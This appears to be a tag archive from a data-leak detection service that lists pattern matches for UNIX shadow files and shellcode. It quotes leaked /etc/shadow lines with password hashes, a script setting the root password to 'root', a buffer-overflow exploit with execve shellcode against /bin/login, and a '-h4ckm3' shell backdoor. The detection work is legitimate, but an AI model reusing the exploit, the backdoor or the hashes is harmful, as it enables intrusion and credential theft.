Posts Tagged ‘UNIX Shadow File’
Potential leak of data: UNIX Shadow File
Detected 2 occurrence(s) of ‘root:.*:0:99999:7:::’:
2001, here we come
[root@sucuri www]# cat /etc/shadow
root:iFvywDsrRwmjI:15755:0:99999:7:::
bin:*:14746:0:99999:7:::
daemon:*:14746:0:99999:7:::
adm:*:14746:0:99999:7:::
Potential leak of data: UNIX Shadow File
Detected 1 occurrence(s) of ‘root:.*:0:99999:7:::’:
tc/default/rcS
if [ -e $ROOT/etc/blkid.tab ]; then
    rm $ROOT/etc/blkid.tab
fi
ln -s /dev/null $ROOT/etc/blkid.tab
if [ -e $ROOT/etc/mtab ]; then
    rm $ROOT/etc/mtab
fi
ln -s /proc/mounts $ROOT/etc/mtab
# root password is 'root'
sed -i 's,^root:.*$,root:$1$XPo5vyFS$iJPfS62vFNO09QUIUknpm.:14360:0:99999:7:::,' $ROOT/etc/shadow
chroot $ROOT /usr/bin/apt-get clean
##### All Done
cd /
umount $ROOT > /dev/null 2>&1
echo ""
echo ""
echo ""
echo ""
echo "Installation complete"
echo ""
echo "You can now reboot your device into Debian."
echo
Potential leak of data: Shellcode
Detected 19 occurrence(s) of ‘shellcode’:
sh";
char buffer[82];
void main() {
int i;
long *long_ptr = (long *) buffer;
for (i = 0; i < 32; i++)
*(long_ptr + i) = 0xbffff9ac; // Change the address of the vuln buffer here
for (i = 0; i < strlen(shellcode); i++)
buffer[i] = shellcode[i];
execl(PROG,PROG,"-h4ckm3",buffer,0);
}
<-->
Got it, right???
#########
# 4a. #
#########
Same as the previous one, but for the lazier ones.
if(strcmp(argv[1],"-h4ckm3")==0)
execl("/bin/sh", "sh", "-i", 0);
Detected 1 occurrence(s) of ‘root:.*:0:99999:7:::’:
can easily grab your password file:
Script started on Thu Mar 2 00:17:48 2000
[struck@localhost ~]$ dos -F /etc/shadow
CPU speed set to 378/1 MHz
Running on CPU=586, FPU=1, rdtsc=1
Error in /etc/shadow: (line 001) unrecognized command 'root:SAlNq/oiIe8ik:11018:0:99999:7:::'
Error in /etc/shadow: (line 002) unrecognized command 'bin:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 003) unrecognized command 'daemon:x:11018:0:99999:7:::'
Error in /etc/shadow: (line 004) unrecognized command 'adm:x:11018:0:99999:7:::'
Erro
Detected 8 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’:
stall the prog over the old one. The exploit is here.
<++> secret/xploit.c
#define PROG "/bin/login" // Put the attacked prog here!!!
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char buffer[82];
void main() {
int i;
long *long_ptr = (long *) buffer;
for (i = 0; i < 32; i++)
*(long_ptr + i) = 0xbffff9ac; // Change here the address of the buffer vu
Potential leak of data: UNIX Shadow File
Detected 1 occurrence(s) of ‘root:.*:0:99999:7:::’:
[root@localhost log]# grep andrew /etc/*shadow
[root@localhost log]# cat /etc/shadow
root:*:15816:0:99999:7:::
bin:*:15816:0:99999:7:::
daemon:*:15816:0:99999:7:::
adm:*:15816:0:99999:7:::
lp:*:15816:0:99999:7:::
sync:*:15816:0:99999:7:::
shutdown:*:15816:0:99999:7:::
halt:*:15816:0:99999:7:::
mail:*:15816:0:99999:7:::
news:*:15816:0:99999:7:::
uucp:*:15
Potential leak of data: UNIX Shadow File
Detected 1 occurrence(s) of ‘root:.*:0:99999:7:::’:
root:$1$1wBApkrQ$oCmlaXcRtGpToShs5or9C.:15680:0:99999:7::: bsteinfeldibm:$6$nbaTjjGN$jpaD27f6Kp7KH2bjToUz6V7DN2z2XzFk5Ce8Fx5HGL2tAiEQcj5ulNBGTOvrHSRJw4ipMJvs2BLz0zQeyDMtH1:15694:0:99999:7::: ibm:$6$AM6RqCLQ$lWJmzZPD8JY6Q6cMKU4YM9fVuVCg7Ko1nm1UiHqTMqhBcuJ0NF2Ze4D00mrrl.VnwoSacdkQsAi6kUlAv32Fw0:15694:0:99999:7:::

